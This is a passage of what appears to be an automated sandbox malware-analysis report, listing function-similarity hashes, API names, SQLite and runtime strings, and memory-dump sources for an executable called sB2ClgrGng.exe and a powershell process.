                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                • API String ID: 1405196051-515162456
                                                                                                                                                                                                                                • Opcode ID: c2fef2437538cd055f97cac125a56830f20ac4153c52bdafaefb5b5562f9caec
                                                                                                                                                                                                                                • Instruction ID: 9f5d5c451aa76e992de38877e5dbee149c79caf6425628cb63cd50385bd5220a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2fef2437538cd055f97cac125a56830f20ac4153c52bdafaefb5b5562f9caec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C681DF72B09682A5EB18DB11D464AB977B5FF44B98F558276EA6C0B2CCDF3CE541C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                • API String ID: 1405196051-2451720372
                                                                                                                                                                                                                                • Opcode ID: ca68934a46a8b85495a901118d2f0107886c9b3b238559e4aeab701865ea2892
                                                                                                                                                                                                                                • Instruction ID: 669a77a716af2113a031128eb34a8d62ee25577763a93d9b6143cfcffe83ecd5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca68934a46a8b85495a901118d2f0107886c9b3b238559e4aeab701865ea2892
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8719222B18B4191EF18AF228564BB96391EF55BA4F4843B5EE3D0B2C9DF3DE1958340
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: index '%q'
                                                                                                                                                                                                                                • API String ID: 0-1628151297
                                                                                                                                                                                                                                • Opcode ID: a0ae6ca9fcd77d1787e8a0e907a6e2fe84000f5d14babccdade458f1703f2acf
                                                                                                                                                                                                                                • Instruction ID: e668dd21c5125a42e1cac67f04d522fbb8f933f6eb141ca14782a950766b9b3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0ae6ca9fcd77d1787e8a0e907a6e2fe84000f5d14babccdade458f1703f2acf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C71A536F0865689E7149B65D4A0ABC37A0BB447A8F0406B5EE7A57BD8DF389581C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %02d
                                                                                                                                                                                                                                • API String ID: 1405196051-896308400
                                                                                                                                                                                                                                • Opcode ID: d92aa4ce4f78bd2e745dabe2cc4c8f7c1ebffc5174309bcbfd2f6d9e3b517c72
                                                                                                                                                                                                                                • Instruction ID: db28c23c99e5d8464a57b05702cdc4ce76cd9fbeae7861b7a7fa99431928e414
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d92aa4ce4f78bd2e745dabe2cc4c8f7c1ebffc5174309bcbfd2f6d9e3b517c72
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D71D232B1868285E728AB64D060BFD7764FB94788F044171EE9E17A9DDE3AE485CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFAF6DA8A,?,?,?,00007FFDFAF6DE4B), ref: 00007FFDFAF6D9F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: CRE$INS
                                                                                                                                                                                                                                • API String ID: 1405196051-4116259516
                                                                                                                                                                                                                                • Opcode ID: 5a3376a481f4e1d4c96cc6b6d9d4c5f91b43d14b4293a1d11514fe7dd44e2b73
                                                                                                                                                                                                                                • Instruction ID: e54a528eb3b3a43521b291ec929516ce32c2996d5ca6c8b8ab7619733e70e7ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a3376a481f4e1d4c96cc6b6d9d4c5f91b43d14b4293a1d11514fe7dd44e2b73
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F51D121B0DA4280FB289B269464B796391AF81FE4F584275EDAD4F7DDEE3DE8419300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %sSCALAR SUBQUERY %d$CORRELATED
                                                                                                                                                                                                                                • API String ID: 1405196051-3437972362
                                                                                                                                                                                                                                • Opcode ID: b115121a64648f4ae5b9ff8029ecb236f9238a45bec9cd0bf403c8d6410345e6
                                                                                                                                                                                                                                • Instruction ID: 17f9fd7da4b676d81a779a2714216b644b224af12739f0614da0b857ebc27468
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b115121a64648f4ae5b9ff8029ecb236f9238a45bec9cd0bf403c8d6410345e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78719272B087818BE764CF25D450A6A77A0FB85794F444275EBAD47BD9DB3CE850CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                • Instruction ID: 09c06f490ac8816fbc27c8c6d1364462711493603c501fad9900685126725f33
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A841F913A0CA82DAF764B725D5933796B90EF80BA4F144235EE5C86ADDDF3ED4418700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF644889046
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF64487CBA5), ref: 00007FF644889064
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                                • API String ID: 3580290477-2965912956
                                                                                                                                                                                                                                • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                • Instruction ID: 32b3f3127922d3cd5c9320172619681a085a3b7bba5847fb0bf508917d675777
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23413936A0CA528EEB15BF2598C20B967A5EF45BD4B564035ED4E87B89DF3CE481C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 1405196051-2766056989
                                                                                                                                                                                                                                • Opcode ID: 4f90f53215605e3b183ac4adea1687a30c3e64344693984ba208431b3d7bf61b
                                                                                                                                                                                                                                • Instruction ID: 5251c017dc6c0cac29c482dce9e65ea293d3cdc315ab1d4abd0de71074f9ee33
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f90f53215605e3b183ac4adea1687a30c3e64344693984ba208431b3d7bf61b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15418D24F1F78786FB699B116878D7527A0AF067C0F0C41B9D86E466ECDF3EA4809700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction ID: d46a9655ffac21e5b482143abb3de813be5387ae12781428e541197a31f20343
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC418F22A1CA8189EB60BF25E4853AA67A1FBA8794F444135EE4DC7B9CEF3CD445C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$System$File
                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                • Opcode ID: c968c355feb94c5b440177db6edb28bb9214d3af88eb205657e6bed885a85f80
                                                                                                                                                                                                                                • Instruction ID: 258fbe8b90f5be8a9692458530bd0e0267cfbd81c00f4d787cace86a719ca339
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c968c355feb94c5b440177db6edb28bb9214d3af88eb205657e6bed885a85f80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1521D172B0464685EBA48F29D420B7977E4E788B98F888135DA6DC77D9EF3DE1408740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                • Instruction ID: 325a810fdf6a7a7077d78a166e7dfaffa565f521c16f16e5947c9281b6c7cdb3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6321D262A1C68189EB20FB11D48627D73A1FB88B44F464235DF8D83699DF7DE944CB41
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                • Instruction ID: 187bd0a083416dd84e950d13af2fdb7fcfc2929a143ad516ae7646986dbf66de
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03112E3261CB8186EB61AF16E8902597BE4FB88B88F588230DF8D47759DF3DD551C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                • Instruction ID: 3b94e68c8aa6fbeaffad1e9f2bcddb0b45d18847c0216af44ff3b419a800d7e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97014F62A1CA02DEF720BF6094A727E63A0FF89754F840435DD4DC669AEF2EE5049B14
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2064711335.00007FFD9A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A990000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a990000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 61af3d83ce049be550c0ea5407a0048517f81c3f788dab3a5cc4f1cca7d61397
                                                                                                                                                                                                                                • Instruction ID: 70a174ca4da6dc789c10c5f0792f97784a0dc6765bc26bf27b019be57350c7d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61af3d83ce049be550c0ea5407a0048517f81c3f788dab3a5cc4f1cca7d61397
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAD15A23B0EAC92FEB69DB6848745B57B90FF96390B5801FED19DCB0D3DA19A805C341
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: aebde3f1232c2e38175831c80282f39692075820da9eb93581435806e0bc85ef
                                                                                                                                                                                                                                • Instruction ID: c08a903dbfdfa32ea3a583266216acb7419cda8ae0a7934b74d86f56ba87086e
